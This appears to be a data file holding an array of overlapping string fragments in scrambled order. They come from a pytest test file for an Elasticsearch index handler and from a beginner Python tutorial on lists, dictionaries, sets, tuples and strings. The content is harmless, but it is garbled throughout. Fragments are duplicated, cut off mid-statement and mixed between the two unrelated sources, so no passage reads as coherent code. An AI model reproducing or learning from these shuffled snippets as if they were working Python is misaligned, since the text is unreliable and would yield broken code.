index_handler.handle_http(res)", "es_options={}, name='test1', tenant='test-tenant', schema=PolySchemaB ) alias = index_handler.get_alias_from_namespace(PolySchemaA.name) # register", "indent=2)) assert(first('$.name', index) == f'{tenant}.{name}') geo_name = es_options['geo_point_name'] assert(first( f'$.body.mappings._doc.properties.{geo_name}',", "and limitations # under the License. import json import pytest", "\"1001\"}} }) assert(res.get('hits').get('max_score') == 1.0) # find by string res", "# under the License. import json import pytest import requests", "index = index_handler.get_index_for_topic(name, geo_name, auto_ts, ComplexSchema) index = index.get('mappings', None)", "applicable law or agreed to in writing, # software distributed", "@pytest.mark.unit def test___format_lookups(ComplexSchema): formatted = index_handler._format_lookups(ComplexSchema) assert( json.dumps( formatted.get( 'operational_status'),", "is distributed on an # \"AS IS\" BASIS, WITHOUT WARRANTIES", "{}).get('title') == name) @pytest.mark.unit def test___find_timestamp(ComplexSchema): result = index_handler._find_timestamp(ComplexSchema) assert(result", "es.search(index=index_name, body={ \"query\": {\"term\": {\"poly\": \"1001\"}} }) assert(res.get('hits').get('max_score') < 1.0)", "test__update_es_index(TestElasticsearch, PolySchemaA, PolySchemaB): # register index with mapping es =", "== 'integer') assert(first('$.username.type', res) == 'keyword') assert(first('$._start.type', res) == 'date')", "# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or", "doc = { 'id': doc_id, 'poly': '1001' } index_a =", "AutoGenSchema) assert(res.get('attributes', {}).get('title') == name) @pytest.mark.unit def test___find_timestamp(ComplexSchema): result =", "this work for additional information # regarding copyright ownership. #", "}) assert(res.get('hits').get('max_score') == 1.0) # find by string res =", "software distributed under the License is distributed on an #", "string res = es.search(index=index_name, body={ \"query\": {\"term\": {\"poly\": 1001}} })", "== 'epoch_millis') assert(len(list(res.keys())) == 55) @pytest.mark.unit def test__make_kibana_index(AutoGenSchema): name =", "get_logger from app import index_handler from . import * #", "Licensed under the Apache License, Version 2.0 (the 'License'); #", "index_handler.get_alias_from_namespace(PolySchemaA.name) # register schema A index_handler.update_es_index(es, index_a, 'test-tenant', alias) #", "tenant='test-tenant', schema=PolySchemaA ) index_name = index_a.get('name') index_b = index_handler.get_es_index_from_subscription( es_options={},", "a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #", "res) == 'integer') assert(first('$.username.type', res) == 'keyword') assert(first('$._start.type', res) ==", "SubscriptionDefinition.get('es_options') tenant = 'dev' name = 'a-topic' alias = es_options.get('alias_name')", "governing permissions and limitations # under the License. import json", "json={'error': 'not found'}, status=404 ) res = requests.get('http://bad-url') with pytest.raises(requests.exceptions.HTTPError):", "'operational_status'), sort_keys=True) ) @pytest.mark.unit def test___format_single_lookup(ComplexSchema): matching = ComplexSchema.get_node('MySurvey.operational_status') res", "found'}, status=404 ) res = requests.get('http://bad-url') with pytest.raises(requests.exceptions.HTTPError): index_handler.handle_http(res) @pytest.mark.unit", "assert(first('$.mandatory_date.type', res) == 'date') assert(first('$.mandatory_date.format', res) == 'date') assert(first('$.optional_dt.type', res)", "json.dumps( formatted.get( 'operational_status'), sort_keys=True) == json.dumps( SAMPLE_FIELD_LOOKUP.get( 'operational_status'), sort_keys=True) )", "res) == 'epoch_millis') assert(len(list(res.keys())) == 55) @pytest.mark.unit def test__make_kibana_index(AutoGenSchema): name", "# fixtures LOG = get_logger('TEST-IDX') # convenience function for jsonpath", "index_handler.make_kibana_index(name, AutoGenSchema) assert(res.get('attributes', {}).get('title') == name) @pytest.mark.unit def test___find_timestamp(ComplexSchema): result", "'epoch_millis') assert(len(list(res.keys())) == 55) @pytest.mark.unit def test__make_kibana_index(AutoGenSchema): name = 'kibana-index-name'", "# KIND, either express or implied. See the License for", "\"query\": {\"term\": {\"poly\": \"1001\"}} }) assert(res.get('hits').get('max_score') == 1.0) # find", "= index_handler.get_alias_from_namespace(namespace) assert(res == 'A_Gather_Form') @pytest.mark.integration def test__update_es_index(TestElasticsearch, PolySchemaA, PolySchemaB):", "tenant='test-tenant', schema=PolySchemaB ) alias = index_handler.get_alias_from_namespace(PolySchemaA.name) # register schema A", "assert(res.get('hits').get('max_score') == 1.0) # find by string res = es.search(index=index_name,", "language governing permissions and limitations # under the License. import", "import get_logger from app import index_handler from . import *", "\"1001\"}} }) assert(res.get('hits').get('max_score') < 1.0) # find imperfect by string", "B index_handler.update_es_index(es, index_b, 'test-tenant', alias) es.indices.refresh(index=index_name) res = es.search(index=index_name, body={", "index_handler.get_index_for_topic(name, geo_name, auto_ts, ComplexSchema) index = index.get('mappings', None) assert(len(index) ==", "by applicable law or agreed to in writing, # software", "body=doc ) es.indices.refresh(index=index_name) res = es.search(index=index_name, body={ \"query\": {\"term\": {\"poly\":", "# Unless required by applicable law or agreed to in", "= index_handler.get_alias_from_namespace(PolySchemaA.name) # register schema A index_handler.update_es_index(es, index_a, 'test-tenant', alias)", "for additional information # regarding copyright ownership. # # Licensed", "= index_handler.get_es_index_from_subscription( es_options={}, name='test1', tenant='test-tenant', schema=PolySchemaA ) index_name = index_a.get('name')", "@pytest.mark.unit def test__get_index_for_topic(SubscriptionDefinition, ComplexSchema): name = 'Person' es_options = SubscriptionDefinition.get('es_options')", "IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND,", "imperfect by string # migrate to schema B index_handler.update_es_index(es, index_b,", "License. You may obtain a copy of the License at", "under the License. import json import pytest import requests import", "You may obtain a copy of the License at #", "ComplexSchema ) LOG.debug(json.dumps(index, indent=2)) assert(first('$.name', index) == f'{tenant}.{name}') geo_name =", "index = index.get('mappings', None) assert(len(index) == 1) assert(first('$._doc', index) is", "limitations # under the License. import json import pytest import", "= get_logger('TEST-IDX') # convenience function for jsonpath @responses.activate @pytest.mark.unit def", "== 'geo_point') assert(first(f'$._doc._meta.aet_auto_ts', index) == auto_ts) @pytest.mark.unit def test__get_es_types_from_schema(ComplexSchema): res", "body={ \"query\": {\"term\": {\"poly\": \"1001\"}} }) assert(res.get('hits').get('max_score') == 1.0) #", "index_handler.handle_http(res) @pytest.mark.unit def test__get_es_index_from_autoconfig(SubscriptionDefinition, ComplexSchema): es_options = SubscriptionDefinition.get('es_options') tenant =", "def test__make_kibana_index(AutoGenSchema): name = 'kibana-index-name' res = index_handler.make_kibana_index(name, AutoGenSchema) assert(res.get('attributes',", "get_logger('TEST-IDX') # convenience function for jsonpath @responses.activate @pytest.mark.unit def test__handle_http():", "# convenience function for jsonpath @responses.activate @pytest.mark.unit def test__handle_http(): responses.add(", "test___format_single_lookup(ComplexSchema): matching = ComplexSchema.get_node('MySurvey.operational_status') res = index_handler._format_single_lookup(matching) assert( json.dumps(res, sort_keys=True)", ". import * # noqa # fixtures LOG = get_logger('TEST-IDX')", "assert(first('$.username.type', res) == 'keyword') assert(first('$._start.type', res) == 'date') assert(first('$.geometry.type', res)", "'License'); # you may not use this file except in" ]
[]
[ "print(odd) # In[13]: # Deleting list items my_list = ['p',", "# Changing tuple values my_tuple = (4, 2, 3, [6,", "# In[13]: # Deleting list items my_list = ['p', 'r',", "extend to multiple lines String_var = \"\"\" This document will", "'a', 'm', 'i', 'z') print(my_tuple) # In[37]: #String and its", "my_dict['age'] = 27 #Output: {'age': 27, 'name': 'Jack'} print(my_dict) #", "# In[26]: #Tuple and its method # In[27]: # Tuple", "explore all the concepts of Python Strings!!! \"\"\" # Replace", "entire list del my_list # In[14]: # Appending and Extending", "integers my_list = [1, 2, 3] # list with mixed", "odd.extend([9, 11, 13]) print(odd) # In[15]: #Dictionary and function #", "2:'ball'}) # from sequence having each item as a pair", "in Python odd = [1, 3, 5] odd.append(7) print(odd) odd.extend([9,", "{'name': 'Jack', 'age': 26} # update value my_dict['age'] = 27", "indexing print(n_list[0][1]) print(n_list[1][3]) # Error! Only integer can be used", "each item as a pair my_dict = dict([(1,'apple'), (2,'ball')]) #", "# Output: {'address': 'Downtown', 'age': 27, 'name': 'Jack'} print(my_dict) #", "= {1.0, \"Hello\", (1, 2, 3)} print(my_set) # In[25]: #", "my_set = {1.0, \"Hello\", (1, 2, 3)} print(my_set) # In[25]:", "print(my_list[0]) # Output: o print(my_list[2]) # Output: e print(my_list[4]) #", "In[30]: # Accessing tuple elements using indexing my_tuple = ('p','e','r','m','i','t')", "= [\"mouse\", [8, 4, 6], ['a']] # In[11]: # List", "document will help you to explore all the concepts of", "= [1, \"Hello\", 3.4] # In[7]: # nested list my_list", "1, 5]] # Nested indexing print(n_list[0][1]) print(n_list[1][3]) # Error! Only", "= ['p', 'r', 'o', 'b', 'l', 'e', 'm'] # delete", "# empty list my_list = [] # list of integers", "examples - all assignments are identical. String_var = 'Python' String_var", "print(my_dict['name']) # Output: 26 print(my_dict.get('age')) # In[21]: # Changing and", "{'address': 'Downtown', 'age': 27, 'name': 'Jack'} print(my_dict) # In[22]: #Sets", "and store in another variable substr_var = String_var.replace(\"document\", \"tutorial\") print", "Changing and adding Dictionary Elements my_dict = {'name': 'Jack', 'age':", "'m'] # delete one item del my_list[2] print(my_list) # delete", "its function # In[23]: my_set = {1, 2, 3} print(my_set)", "my_tuple = ('p', 'r', 'o', 'g', 'r', 'a', 'm', 'i',", "'r', 'a', 'm', 'i', 'z') # Output: ('p', 'r', 'o',", "# In[32]: print(my_tuple[-6]) # In[36]: # Changing tuple values my_tuple", "using dict() my_dict = dict({1:'apple', 2:'ball'}) # from sequence having", "\"\"\" # Replace \"document\" with \"tutorial\" and store in another", "changed my_tuple[3][0] = 9 # Output: (4, 2, 3, [9,", "# Appending and Extending lists in Python odd = [1,", "'age': 26} # Output: Jack print(my_dict['name']) # Output: 26 print(my_dict.get('age'))", "In[9]: # Appending and Extending lists in Python odd =", "3, 4, 3, 2} print(my_set) # In[26]: #Tuple and its", "= dict({1:'apple', 2:'ball'}) # from sequence having each item as", "String_var = \"\"\"Python\"\"\" # with Triple quotes Strings can extend", "# In[7]: # nested list my_list = [\"mouse\", [8, 4,", "Output: ('p', 'r', 'o', 'g', 'r', 'a', 'm', 'i', 'z')", "\"\"\" This document will help you to explore all the", "# Output: Jack print(my_dict['name']) # Output: 26 print(my_dict.get('age')) # In[21]:", "9 # Output: (4, 2, 3, [9, 5]) print(my_tuple) #", "my_list = ['p', 'r', 'o', 'b', 'l', 'e', 'm'] #", "{1.0, \"Hello\", (1, 2, 3)} print(my_set) # In[25]: # set", "= [\"Happy\", [2, 0, 1, 5]] # Nested indexing print(n_list[0][1])", "lists in Python odd = [1, 3, 5] odd.append(7) print(odd)", "Output: p print(my_list[0]) # Output: o print(my_list[2]) # Output: e", "{'name': 'John', 1: [2, 4, 3]} # using dict() my_dict", "# In[24]: my_set = {1.0, \"Hello\", (1, 2, 3)} print(my_set)", "with mixed keys my_dict = {'name': 'John', 1: [2, 4,", "have duplicates my_set = {1, 2, 3, 4, 3, 2}", "elements using indexing my_tuple = ('p','e','r','m','i','t') print(my_tuple[0]) print(my_tuple[5]) # In[31]:", "print(type(my_tuple)) # In[30]: # Accessing tuple elements using indexing my_tuple", "add item my_dict['address'] = 'Downtown' # Output: {'address': 'Downtown', 'age':", "print(odd) # In[15]: #Dictionary and function # In[18]: y_dict =", "# get vs [] for retrieving elements my_dict = {'name':", "11, 13]) print(odd) # In[15]: #Dictionary and function # In[18]:", "0, 1, 5]] # Nested indexing print(n_list[0][1]) print(n_list[1][3]) # Error!", "In[36]: # Changing tuple values my_tuple = (4, 2, 3,", "method # In[27]: # Tuple having integers my_tuple = (1,", "#Sets and its function # In[23]: my_set = {1, 2,", "'ball'} # dictionary with mixed keys my_dict = {'name': 'John',", "dict({1:'apple', 2:'ball'}) # from sequence having each item as a", "of integers my_list = [1, 2, 3] # list with", "\"Hello\", (1, 2, 3)} print(my_set) # In[25]: # set cannot", "\"\"\"Python\"\"\" # with Triple quotes Strings can extend to multiple", "my_dict = dict({1:'apple', 2:'ball'}) # from sequence having each item", "= (\"hello\") print(type(my_tuple)) # In[30]: # Accessing tuple elements using", "and function # In[18]: y_dict = {} # dictionary with", "'tuple' object does not support item assignment # my_tuple[1] =", "my_dict = {'name': 'John', 1: [2, 4, 3]} # using", "# In[11]: # List indexing my_list = ['p', 'r', 'o',", "'e', 'm'] # delete one item del my_list[2] print(my_list) #", "3, [9, 5]) print(my_tuple) # Tuples can be reassigned my_tuple", "set cannot have duplicates my_set = {1, 2, 3, 4,", "#String and its function # In[38]: # Python string examples", "dictionary with integer keys my_dict = {1: 'apple', 2: 'ball'}", "list my_list = [] # list of integers my_list =", "Strings!!! \"\"\" # Replace \"document\" with \"tutorial\" and store in", "# set cannot have duplicates my_set = {1, 2, 3,", "# Accessing tuple elements using indexing my_tuple = ('p','e','r','m','i','t') print(my_tuple[0])", "for indexing print(my_list[4]) # In[9]: # Appending and Extending lists", "string examples - all assignments are identical. String_var = 'Python'", "String_var = \"Python\" String_var = \"\"\"Python\"\"\" # with Triple quotes", "# update value my_dict['age'] = 27 #Output: {'age': 27, 'name':", "in another variable substr_var = String_var.replace(\"document\", \"tutorial\") print (substr_var) #", "= {1, 2, 3} print(my_set) # In[24]: my_set = {1.0,", "# using dict() my_dict = dict({1:'apple', 2:'ball'}) # from sequence", "# delete one item del my_list[2] print(my_list) # delete multiple", "Python Strings!!! \"\"\" # Replace \"document\" with \"tutorial\" and store", "'g', 'r', 'a', 'm', 'i', 'z') # Output: ('p', 'r',", "'r', 'a', 'm', 'i', 'z') print(my_tuple) # In[37]: #String and", "(2,'ball')]) # In[20]: # get vs [] for retrieving elements", "#!/usr/bin/env python # coding: utf-8 # In[ ]: #List and", "In[11]: # List indexing my_list = ['p', 'r', 'o', 'b',", "print(my_set) # In[25]: # set cannot have duplicates my_set =", "'o', 'g', 'r', 'a', 'm', 'i', 'z') print(my_tuple) # In[37]:", "print(my_set) # In[26]: #Tuple and its method # In[27]: #", "pair my_dict = dict([(1,'apple'), (2,'ball')]) # In[20]: # get vs", "26} # update value my_dict['age'] = 27 #Output: {'age': 27,", "{'age': 27, 'name': 'Jack'} print(my_dict) # add item my_dict['address'] =", "list del my_list # In[14]: # Appending and Extending lists", "odd = [1, 3, 5] odd.append(7) print(odd) odd.extend([9, 11, 13])", "# Output: p print(my_list[0]) # Output: o print(my_list[2]) # Output:", "'m', 'i', 'z') # Output: ('p', 'r', 'o', 'g', 'r',", "my_list[2] print(my_list) # delete multiple items del my_list[1:5] print(my_list) #", "having integers my_tuple = (1, 2, 3) print(my_tuple) # In[28]:", "integer keys my_dict = {1: 'apple', 2: 'ball'} # dictionary", "variable substr_var = String_var.replace(\"document\", \"tutorial\") print (substr_var) # In[ ]:", "'Downtown' # Output: {'address': 'Downtown', 'age': 27, 'name': 'Jack'} print(my_dict)", "data types my_list = [1, \"Hello\", 3.4] # In[7]: #", "item as a pair my_dict = dict([(1,'apple'), (2,'ball')]) # In[20]:", "26} # Output: Jack print(my_dict['name']) # Output: 26 print(my_dict.get('age')) #", "# dictionary with mixed keys my_dict = {'name': 'John', 1:", "'name': 'Jack'} print(my_dict) # In[22]: #Sets and its function #", "my_list = [] # list of integers my_list = [1,", "print(n_list[0][1]) print(n_list[1][3]) # Error! Only integer can be used for", "# In[38]: # Python string examples - all assignments are", "# In[27]: # Tuple having integers my_tuple = (1, 2,", "# Output: o print(my_list[2]) # Output: e print(my_list[4]) # Nested", "['p', 'r', 'o', 'b', 'e'] # Output: p print(my_list[0]) #", "# Deleting list items my_list = ['p', 'r', 'o', 'b',", "= ['p', 'r', 'o', 'b', 'e'] # Output: p print(my_list[0])", "print(my_tuple[-1]) # In[32]: print(my_tuple[-6]) # In[36]: # Changing tuple values", "help you to explore all the concepts of Python Strings!!!", "In[14]: # Appending and Extending lists in Python odd =", "my_set = {1, 2, 3} print(my_set) # In[24]: my_set =", "tuple elements using indexing my_tuple = ('p','e','r','m','i','t') print(my_tuple[0]) print(my_tuple[5]) #", "its function # In[38]: # Python string examples - all", "# from sequence having each item as a pair my_dict", "items del my_list[1:5] print(my_list) # delete entire list del my_list", "print(my_tuple) # Tuples can be reassigned my_tuple = ('p', 'r',", "odd.extend([9, 11, 13]) print(odd) # In[13]: # Deleting list items", "'r', 'o', 'g', 'r', 'a', 'm', 'i', 'z') print(my_tuple) #", "2, 3)} print(my_set) # In[25]: # set cannot have duplicates", "= \"\"\" This document will help you to explore all", "= 'Downtown' # Output: {'address': 'Downtown', 'age': 27, 'name': 'Jack'}", "using indexing my_tuple = ('p','e','r','m','i','t') print(my_tuple[0]) print(my_tuple[5]) # In[31]: print(my_tuple[-1])", "n_list = [\"Happy\", [2, 0, 1, 5]] # Nested indexing", "'Jack', 'age': 26} # update value my_dict['age'] = 27 #Output:", "odd.append(7) print(odd) odd.extend([9, 11, 13]) print(odd) # In[15]: #Dictionary and", "print(my_list[4]) # In[9]: # Appending and Extending lists in Python", "13]) print(odd) # In[13]: # Deleting list items my_list =", "Tuple having integers my_tuple = (1, 2, 3) print(my_tuple) #", "can extend to multiple lines String_var = \"\"\" This document", "my_set = {1, 2, 3, 4, 3, 2} print(my_set) #", "function # In[6]: # empty list my_list = [] #", "integers my_tuple = (1, 2, 3) print(my_tuple) # In[28]: my_tuple", "does not support item assignment # my_tuple[1] = 9 #", "(1, 2, 3) print(my_tuple) # In[28]: my_tuple = (\"hello\") print(type(my_tuple))", "get vs [] for retrieving elements my_dict = {'name': 'Jack',", "print(odd) odd.extend([9, 11, 13]) print(odd) # In[13]: # Deleting list", "my_tuple = (1, 2, 3) print(my_tuple) # In[28]: my_tuple =", "4, 6], ['a']] # In[11]: # List indexing my_list =", "5]) # TypeError: 'tuple' object does not support item assignment", "'o', 'b', 'e'] # Output: p print(my_list[0]) # Output: o", "3]} # using dict() my_dict = dict({1:'apple', 2:'ball'}) # from", "27 #Output: {'age': 27, 'name': 'Jack'} print(my_dict) # add item", "\"Python\" String_var = \"\"\"Python\"\"\" # with Triple quotes Strings can", "print(my_list[4]) # Nested List n_list = [\"Happy\", [2, 0, 1,", "#Output: {'age': 27, 'name': 'Jack'} print(my_dict) # add item my_dict['address']", "27, 'name': 'Jack'} print(my_dict) # add item my_dict['address'] = 'Downtown'", "= (4, 2, 3, [6, 5]) # TypeError: 'tuple' object", "print(my_list[2]) # Output: e print(my_list[4]) # Nested List n_list =", "26 print(my_dict.get('age')) # In[21]: # Changing and adding Dictionary Elements", "values my_tuple = (4, 2, 3, [6, 5]) # TypeError:", "mutable element can be changed my_tuple[3][0] = 9 # Output:", "2, 3, [6, 5]) # TypeError: 'tuple' object does not", "In[23]: my_set = {1, 2, 3} print(my_set) # In[24]: my_set", "[] # list of integers my_list = [1, 2, 3]", "# list with mixed data types my_list = [1, \"Hello\",", "# In[14]: # Appending and Extending lists in Python odd", "print(odd) odd.extend([9, 11, 13]) print(odd) # In[15]: #Dictionary and function", "String_var = 'Python' String_var = \"Python\" String_var = \"\"\"Python\"\"\" #", "e print(my_list[4]) # Nested List n_list = [\"Happy\", [2, 0,", "5]] # Nested indexing print(n_list[0][1]) print(n_list[1][3]) # Error! Only integer", "Only integer can be used for indexing print(my_list[4]) # In[9]:", "List indexing my_list = ['p', 'r', 'o', 'b', 'e'] #", "= 'Python' String_var = \"Python\" String_var = \"\"\"Python\"\"\" # with", "Appending and Extending lists in Python odd = [1, 3,", "= {'name': 'John', 1: [2, 4, 3]} # using dict()", "Tuples can be reassigned my_tuple = ('p', 'r', 'o', 'g',", "'a', 'm', 'i', 'z') # Output: ('p', 'r', 'o', 'g',", "[\"mouse\", [8, 4, 6], ['a']] # In[11]: # List indexing", "[2, 4, 3]} # using dict() my_dict = dict({1:'apple', 2:'ball'})", "Output: {'address': 'Downtown', 'age': 27, 'name': 'Jack'} print(my_dict) # In[22]:", "# In[20]: # get vs [] for retrieving elements my_dict", "Python odd = [1, 3, 5] odd.append(7) print(odd) odd.extend([9, 11,", "can be changed my_tuple[3][0] = 9 # Output: (4, 2,", "my_dict = {'name': 'Jack', 'age': 26} # Output: Jack print(my_dict['name'])", "In[37]: #String and its function # In[38]: # Python string", "assignments are identical. String_var = 'Python' String_var = \"Python\" String_var", "6], ['a']] # In[11]: # List indexing my_list = ['p',", "keys my_dict = {1: 'apple', 2: 'ball'} # dictionary with", "#Tuple and its method # In[27]: # Tuple having integers", "# Output: ('p', 'r', 'o', 'g', 'r', 'a', 'm', 'i',", "p print(my_list[0]) # Output: o print(my_list[2]) # Output: e print(my_list[4])", "This document will help you to explore all the concepts", "be changed my_tuple[3][0] = 9 # Output: (4, 2, 3,", "# Tuple having integers my_tuple = (1, 2, 3) print(my_tuple)", "# list of integers my_list = [1, 2, 3] #", "Accessing tuple elements using indexing my_tuple = ('p','e','r','m','i','t') print(my_tuple[0]) print(my_tuple[5])", "my_tuple = (4, 2, 3, [6, 5]) # TypeError: 'tuple'", "# TypeError: 'tuple' object does not support item assignment #", "Changing tuple values my_tuple = (4, 2, 3, [6, 5])", "'Jack'} print(my_dict) # add item my_dict['address'] = 'Downtown' # Output:", "from sequence having each item as a pair my_dict =", "duplicates my_set = {1, 2, 3, 4, 3, 2} print(my_set)", "Output: (4, 2, 3, [9, 5]) print(my_tuple) # Tuples can", "and function # In[6]: # empty list my_list = []", "List n_list = [\"Happy\", [2, 0, 1, 5]] # Nested", "Output: 26 print(my_dict.get('age')) # In[21]: # Changing and adding Dictionary", "with mixed data types my_list = [1, \"Hello\", 3.4] #", "'o', 'b', 'l', 'e', 'm'] # delete one item del", "to explore all the concepts of Python Strings!!! \"\"\" #", "3, 5] odd.append(7) print(odd) odd.extend([9, 11, 13]) print(odd) # In[13]:", "# In[36]: # Changing tuple values my_tuple = (4, 2,", "In[20]: # get vs [] for retrieving elements my_dict =", "In[ ]: #List and function # In[6]: # empty list", "nested list my_list = [\"mouse\", [8, 4, 6], ['a']] #", "# delete multiple items del my_list[1:5] print(my_list) # delete entire", "['a']] # In[11]: # List indexing my_list = ['p', 'r',", "2, 3, 4, 3, 2} print(my_set) # In[26]: #Tuple and", "Strings can extend to multiple lines String_var = \"\"\" This", "5] odd.append(7) print(odd) odd.extend([9, 11, 13]) print(odd) # In[15]: #Dictionary", "In[26]: #Tuple and its method # In[27]: # Tuple having", "3, 2} print(my_set) # In[26]: #Tuple and its method #", "print(my_tuple[0]) print(my_tuple[5]) # In[31]: print(my_tuple[-1]) # In[32]: print(my_tuple[-6]) # In[36]:", "another variable substr_var = String_var.replace(\"document\", \"tutorial\") print (substr_var) # In[", "value my_dict['age'] = 27 #Output: {'age': 27, 'name': 'Jack'} print(my_dict)", "dict([(1,'apple'), (2,'ball')]) # In[20]: # get vs [] for retrieving", "9 # However, item of mutable element can be changed", "Nested List n_list = [\"Happy\", [2, 0, 1, 5]] #", "element can be changed my_tuple[3][0] = 9 # Output: (4,", "Elements my_dict = {'name': 'Jack', 'age': 26} # update value", "will help you to explore all the concepts of Python", "5]) print(my_tuple) # Tuples can be reassigned my_tuple = ('p',", "# Replace \"document\" with \"tutorial\" and store in another variable", "13]) print(odd) # In[15]: #Dictionary and function # In[18]: y_dict", "[6, 5]) # TypeError: 'tuple' object does not support item", "# List indexing my_list = ['p', 'r', 'o', 'b', 'e']", "sequence having each item as a pair my_dict = dict([(1,'apple'),", "object does not support item assignment # my_tuple[1] = 9", "'name': 'Jack'} print(my_dict) # add item my_dict['address'] = 'Downtown' #", "{} # dictionary with integer keys my_dict = {1: 'apple',", "my_list = [1, 2, 3] # list with mixed data", "(4, 2, 3, [6, 5]) # TypeError: 'tuple' object does", "# In[6]: # empty list my_list = [] # list", "my_list = [1, \"Hello\", 3.4] # In[7]: # nested list", "String_var = \"\"\" This document will help you to explore", "mixed keys my_dict = {'name': 'John', 1: [2, 4, 3]}", "dict() my_dict = dict({1:'apple', 2:'ball'}) # from sequence having each", "However, item of mutable element can be changed my_tuple[3][0] =", "'z') print(my_tuple) # In[37]: #String and its function # In[38]:", "empty list my_list = [] # list of integers my_list", "= 27 #Output: {'age': 27, 'name': 'Jack'} print(my_dict) # add", "= \"\"\"Python\"\"\" # with Triple quotes Strings can extend to", "del my_list[2] print(my_list) # delete multiple items del my_list[1:5] print(my_list)", "# add item my_dict['address'] = 'Downtown' # Output: {'address': 'Downtown',", "'age': 26} # update value my_dict['age'] = 27 #Output: {'age':", "In[28]: my_tuple = (\"hello\") print(type(my_tuple)) # In[30]: # Accessing tuple", "indexing my_tuple = ('p','e','r','m','i','t') print(my_tuple[0]) print(my_tuple[5]) # In[31]: print(my_tuple[-1]) #", "all assignments are identical. String_var = 'Python' String_var = \"Python\"", "of Python Strings!!! \"\"\" # Replace \"document\" with \"tutorial\" and", "all the concepts of Python Strings!!! \"\"\" # Replace \"document\"", "my_dict = {1: 'apple', 2: 'ball'} # dictionary with mixed", "having each item as a pair my_dict = dict([(1,'apple'), (2,'ball')])", "my_tuple = (\"hello\") print(type(my_tuple)) # In[30]: # Accessing tuple elements", "\"Hello\", 3.4] # In[7]: # nested list my_list = [\"mouse\",", "store in another variable substr_var = String_var.replace(\"document\", \"tutorial\") print (substr_var)", "# coding: utf-8 # In[ ]: #List and function #", "[8, 4, 6], ['a']] # In[11]: # List indexing my_list", "my_list = [\"mouse\", [8, 4, 6], ['a']] # In[11]: #", "print(my_tuple) # In[37]: #String and its function # In[38]: #", "'m', 'i', 'z') print(my_tuple) # In[37]: #String and its function", "= dict([(1,'apple'), (2,'ball')]) # In[20]: # get vs [] for", "= (1, 2, 3) print(my_tuple) # In[28]: my_tuple = (\"hello\")", "concepts of Python Strings!!! \"\"\" # Replace \"document\" with \"tutorial\"", "'l', 'e', 'm'] # delete one item del my_list[2] print(my_list)", "mixed data types my_list = [1, \"Hello\", 3.4] # In[7]:", "not support item assignment # my_tuple[1] = 9 # However,", "# Tuples can be reassigned my_tuple = ('p', 'r', 'o',", "# with Triple quotes Strings can extend to multiple lines", "= [1, 3, 5] odd.append(7) print(odd) odd.extend([9, 11, 13]) print(odd)", "TypeError: 'tuple' object does not support item assignment # my_tuple[1]", "vs [] for retrieving elements my_dict = {'name': 'Jack', 'age':", "= 9 # Output: (4, 2, 3, [9, 5]) print(my_tuple)", "item my_dict['address'] = 'Downtown' # Output: {'address': 'Downtown', 'age': 27,", "its method # In[27]: # Tuple having integers my_tuple =", "indexing print(my_list[4]) # In[9]: # Appending and Extending lists in", "'Jack', 'age': 26} # Output: Jack print(my_dict['name']) # Output: 26", "4, 3, 2} print(my_set) # In[26]: #Tuple and its method", "# In[15]: #Dictionary and function # In[18]: y_dict = {}", "In[24]: my_set = {1.0, \"Hello\", (1, 2, 3)} print(my_set) #", "('p', 'r', 'o', 'g', 'r', 'a', 'm', 'i', 'z') print(my_tuple)", "3, [6, 5]) # TypeError: 'tuple' object does not support", "In[15]: #Dictionary and function # In[18]: y_dict = {} #", "# In[31]: print(my_tuple[-1]) # In[32]: print(my_tuple[-6]) # In[36]: # Changing", "my_list = ['p', 'r', 'o', 'b', 'e'] # Output: p", "Output: Jack print(my_dict['name']) # Output: 26 print(my_dict.get('age')) # In[21]: #", "2, 3) print(my_tuple) # In[28]: my_tuple = (\"hello\") print(type(my_tuple)) #", "# In[18]: y_dict = {} # dictionary with integer keys", "python # coding: utf-8 # In[ ]: #List and function", "# In[21]: # Changing and adding Dictionary Elements my_dict =", "{1, 2, 3, 4, 3, 2} print(my_set) # In[26]: #Tuple", "'e'] # Output: p print(my_list[0]) # Output: o print(my_list[2]) #", "and adding Dictionary Elements my_dict = {'name': 'Jack', 'age': 26}", "# Nested List n_list = [\"Happy\", [2, 0, 1, 5]]", "with integer keys my_dict = {1: 'apple', 2: 'ball'} #", "4, 3]} # using dict() my_dict = dict({1:'apple', 2:'ball'}) #", "In[38]: # Python string examples - all assignments are identical.", "'r', 'o', 'g', 'r', 'a', 'm', 'i', 'z') # Output:", "'Python' String_var = \"Python\" String_var = \"\"\"Python\"\"\" # with Triple", "2, 3} print(my_set) # In[24]: my_set = {1.0, \"Hello\", (1,", "list of integers my_list = [1, 2, 3] # list", "be used for indexing print(my_list[4]) # In[9]: # Appending and", "Extending lists in Python odd = [1, 3, 5] odd.append(7)", "3) print(my_tuple) # In[28]: my_tuple = (\"hello\") print(type(my_tuple)) # In[30]:", "[1, 3, 5] odd.append(7) print(odd) odd.extend([9, 11, 13]) print(odd) #", "In[27]: # Tuple having integers my_tuple = (1, 2, 3)", "# In[ ]: #List and function # In[6]: # empty", "{1: 'apple', 2: 'ball'} # dictionary with mixed keys my_dict", "'apple', 2: 'ball'} # dictionary with mixed keys my_dict =", "utf-8 # In[ ]: #List and function # In[6]: #", "'i', 'z') # Output: ('p', 'r', 'o', 'g', 'r', 'a',", "# delete entire list del my_list # In[14]: # Appending", "'z') # Output: ('p', 'r', 'o', 'g', 'r', 'a', 'm',", "In[21]: # Changing and adding Dictionary Elements my_dict = {'name':", "- all assignments are identical. String_var = 'Python' String_var =", "as a pair my_dict = dict([(1,'apple'), (2,'ball')]) # In[20]: #", "for retrieving elements my_dict = {'name': 'Jack', 'age': 26} #", "function # In[23]: my_set = {1, 2, 3} print(my_set) #", "dictionary with mixed keys my_dict = {'name': 'John', 1: [2,", "del my_list[1:5] print(my_list) # delete entire list del my_list #", "adding Dictionary Elements my_dict = {'name': 'Jack', 'age': 26} #", "'r', 'o', 'b', 'e'] # Output: p print(my_list[0]) # Output:", "item of mutable element can be changed my_tuple[3][0] = 9", "print(my_set) # In[24]: my_set = {1.0, \"Hello\", (1, 2, 3)}", "\"document\" with \"tutorial\" and store in another variable substr_var =", "be reassigned my_tuple = ('p', 'r', 'o', 'g', 'r', 'a',", "In[25]: # set cannot have duplicates my_set = {1, 2,", "'g', 'r', 'a', 'm', 'i', 'z') print(my_tuple) # In[37]: #String", "function # In[18]: y_dict = {} # dictionary with integer", "my_dict['address'] = 'Downtown' # Output: {'address': 'Downtown', 'age': 27, 'name':", "# Nested indexing 